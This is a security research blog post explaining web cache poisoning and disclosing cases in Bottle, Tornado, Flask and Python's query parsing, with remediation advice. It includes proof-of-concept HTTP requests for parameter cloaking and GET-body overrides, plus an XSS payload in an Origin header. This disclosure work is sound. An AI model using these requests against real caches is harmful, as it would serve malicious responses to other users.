Skip to main content

Cache poisoning in popular open source packages

Written by:
Adam Goldschmidt
Adam Goldschmidt
wordpress-sync/Package-Lock-Files-blog-03-2

January 18, 2021

0 mins read

Following research done by James Kettle from PortSwigger on web cache poisoning, Snyk’s Security Team decided to deepen our knowledge in this field and to explore these vulnerabilities in the open source domain. We focused our research on the most popular web frameworks both in npm and PyPi, such as Flask (Werkzeug), Bottle, Tornado, and DerbyJS.

This blog post provides an introduction to web cache poisoning and demonstrates why open source maintainers should take this issue into account. Furthermore, this blog provides vulnerability examples within well known open source frameworks that were found to be vulnerable during Snyk's initial research.

Cache poisoning explained

Web cache poisoning is an attack designed to trick the cache into serving malicious responses to valid requests. It is made possible by including unkeyed parameters in the request, which are saved in the cache but unrepresented in the cache key (hence: unkeyed). To fully understand how the attack works, the concept of web caching should be understood.

What is a cache proxy?

Cache proxy is a part of a reverse proxy - an intermediate connection between the client and the web server. When a user accesses a website, proxies interpret and respond to requests on behalf of the original server. Proxy caching is one of the features of a reverse proxy, allowing for faster delivery of responses to the user.

How does caching work?

Caching is storing frequently accessed content in order to speed up subsequent requests to access that content.

Cache keys are used in order for the cache to keep references to the responses. Typically, a cache key consists of the values of one or more response headers and a part of the URL.

For example, for the following HTTP request, the cache key might be localhost/p/?a=1.

GET /p/?a=1 HTTP/1.1
Host: localhost
Origin: example
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
wordpress-sync/preventing-cache-poisoning-in-os-packages-1

When receiving a new request, if the cache is able to find a matching cache key then the saved response will be served instead of generating a new response.

As can be seen in the example above, there are headers which can possibly affect the response but are not reflected in the cache key. This means that if we change their values, the response will get saved in the same cache “spot”, but with a different value.

The following table shows how three different requests are treated with the cache key defined as $host$query_args:

Host

Accept-Encoding

Query arguments

Cache key

example.com

gzip, deflate

?q=search

example.com?q=search

example.com

identity

?q=search

example.com?q=search

snyk.io

gzip, deflat

snyk.io

The first two rows have the same cache key despite having different Accept-Encoding values, therefore they will be cached in the same cache spot.

Understanding unkeyed parameters

wordpress-sync/preventing-cache-poisoning-in-os-packages-2

Inputs that aren’t part of the cache key are called unkeyed parameters. This becomes an issue when these parameters can cause malicious behavior in the application. For example, an attacker can turn a reflected XSS into a stored XSS. Let’s take this request for example:

GET / HTTP/1.1
Host: somesite.com
Origin: <script>alert(1)</script>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Assuming that the Origin parameter is reflected unsanitized and can cause an XSS and is not keyed, every user that visits somesite.com/ will be served the malicious response, until the cached response expires.

To learn more about cache poisoning and the possible attack vectors, I recommend reading the following posts by James Kettle: Practical Web Cache Poisoning and Web Cache Entanglement: Novel Pathways to Poisoning.

Exploring vulnerabilities within web frameworks

A web framework allows the developer to effortlessly generate HTTP responses. From Wikipedia: “Web frameworks provide a standard way to build and deploy web applications on the World Wide Web. Web frameworks aim to automate the overhead associated with common activities performed in web development.”. Usually, these frameworks would contain some security measures in order to make developers' life even easier.

Developers often use web frameworks in conjunction with a cache proxy, such as NGINX or Varnish.

This research shows that many of the popular frameworks today are vulnerable to web cache poisoning out of the box, almost regardless of the cache proxy being used—unless explicitly configured to defend against these sort of attacks, which most developers are usually not aware of or do not have sufficient knowledge to do. The following attack vectors were performed on several web frameworks using NGINX and Varnish.

GET parameter cloaking in Python and Bottle

wordpress-sync/preventing-cache-poisoning-in-os-packages-3

When the attacker can separate query parameters using a semicolon ;, they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter—such asutm_* parameters, which are usually unkeyed. The W3C recommendation recommends using ampersands as the separators (“Let strings be the result of strictly splitting the string payload on U+0026 AMPERSAND characters (&)”).

The most notable finding here was Python’s source code (CVE-2021-23336), which contains a method called parse_qslthat parses URL query parameters by a semicolon as well as an ampersand. This method is then used in frameworks, such as Tornado, in order to parse query parameters, which might lead to a web cache poisoning exploitation chain.

Bottle (CVE-2020-28473), Tornado, and Rack were found to be vulnerable. Let’s take a look at an example for this vector, exploiting Bottle.

An attacker uses q=cat as the parameter for a search box and overriding it with a different value. Here are the request and the response:

GET /search/?q=cat&utm_content=1;q=dog! HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:45:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT
X-Cache: HIT

Your search query: dog!

Now let’s assume a real user searches for “cat” while the malicious response is still cached:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:45:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT
X-Cache: HIT

Your search query: dog!

The attacker was able to change a legitimate request, replacing the search parameter. The reasoning behind this is that the server sees 3 parameters here: q, utm_content, and then q again. It will override the value of the first q parameter with the last one. On the other hand, the proxy considers this full string: ?q=cat&utm_content=1;q=dog! as the value of utm_content, which is why the cache key would only contain localhost?q=cat.

The remediation for this vulnerability should be to only use an ampersand (&) as a query parameter separator unless specified otherwise by the developer. Werkzeug, for example, allows developers to specify custom parameters and take ampersand as the default one. Bottle’s maintainers decided to fix this by not splitting query strings on ;, introduced in version 0.12.19. The Rails framework was also found to be vulnerable to this method (discovered by James Kettle, disclosed to us with the help of Jonathan Leitschuh), but this is not yet fixed at the time of writing.

GET body parameters (fat GET) vulnerabilities in Flask and Tornado

wordpress-sync/preventing-cache-poisoning-in-os-packages-4

In some proxies, NGINX for example, it is possible to include body parameters in a GET request. While this is not strictly forbidden in the HTTP RFC (“A payload within a GET request message has no defined semantics; sending a payload body on a GET request might cause some existing implementations to reject the request”), several frameworks were found to include these parameters in built-in methods which are not explicitly used for body parameters.

This might lead to developers trying to fetch GET query parameters, but instead retrieving body parameters. These parameters are not keyed in the cache, which could lead to two problems:

Override of parameters

An attacker can override GET query parameters with GET body parameters and deliver the cached response to other users.

This issue was found in Tornado when used with NGINX.

Since Tornado gives precedence to the body parameters, it was possible to override innocent users requests with malicious ones. Following our example from before, searching for a cat:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 6

q=dog!

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:51:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:51:53 GMT
X-Cache: HIT

Your search query: dog!

Now when a user searches for “cat”, this would be the flow:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:53:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:51:55 GMT
X-Cache: HIT

Your search query: dog!

Given a case scenario where a reflected cross-site scripting (XSS) vulnerability exists, this could be turned into a stored XSS using this technique which can be delivered to other application users.

Injection of extra parameters

An attacker can inject additional parameters and deliver the cached response to other users. This is not as severe as the first option, but can nonetheless be critical when chained with the right gadgets (One such example would be altering the request method by using _method in some implementations). This was proven to be possible in Flask.

GET /report HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 32

{“reason”:”this is an extra field”}

This request would cause all subsequent requests of innocent users to contain the extra parameter.

Snyk found that multiple frameworks allowed this behavior. However, multiple maintainers contacted by us did not see this as a direct vulnerability in the context of their package. For this reason, Snyk has decided to not issue advisories for these issues.

However, it is possible to provide remediation within the packages themselves by disallowing developers from fetching body data using these ambiguous methods, as many developers use request.params as a convenience, without being aware of the implications. Another solution can be to not give precedence to the body parameters when using these ambiguous methods, as it allows overriding of legitimate query parameters.

For example, Werkzeug maintainers decided to fix this by preventing request.valuesfrom using request.form in GET requests, and Tornado’s maintainers went with a different approach of adding a flag to make the parsing of GET request bodies opt-in (which is not released yet).

Scope of remediation

During this research, we identified numerous cases where the complexity of the multiple attack vectors led to maintainers not always understanding if the criteria of remediation are in the scope of their maintained library or if it should be dealt with at the proxy-level.

There are a lot of different scenarios where a cache poisoning might take place, and it is not the web framework's responsibility to mitigate them all. With that being said, the web framework could help protect against some of them, by implementing additional defense-in-depth measures.

It can be argued that proxies should not ignore GET body parameters, as many implementations still use them. They can, however, cache these keys as if they were query parameters. Moreover, the frameworks can prevent developers from using ambiguous methods while still allowing the use of body parameters. The same goes for parameter cloaking—proxies should not use semicolons as separators because it’s not recommended in the RFC, but frameworks can only allow it if the developer explicitly defines it.

Minimizing the risk of cache poisoning as developers

Individual developers can decrease the threat of being vulnerable by adhering to these points:

  • Be aware of the cache key:If your server splits query arguments using a semicolon, make sure your cache proxy does the same. Furthermore, make sure your cache key contains the necessary headers to prevent attackers from using unkeyed parameters to achieve web cache poisoning.

  • Ignore GET body parametersunless they are needed for the flow of the program, and if so, make sure to only use them when needed.

  • Detect and fix other vulnerabilities within your application:Web cache poisoning is usually used in a chain of exploitation, where an attacker can deliver a malicious response to other users, for example turning a reflected XSS to a stored one. Developers should do their best to secure their applications against these common vulnerabilities even if they seem less severe.

Summary

To conclude, this research shows that open source frameworks are vulnerable to web cache poisoning attacks almost regardless of the proxy being used (excluding some cases). While it is possible to mitigate these attacks at the proxy-level, many developers are not aware of these attack vectors and are not implementing the required safeguards at the cache/proxy level.

The purpose of this blog post was to raise awareness amongst the developer community. While only showing two possible vectors of web cache poisoning, there are many more out there in the wild. Developers should try to follow the points mentioned above and always keep these peculiar vulnerabilities in mind.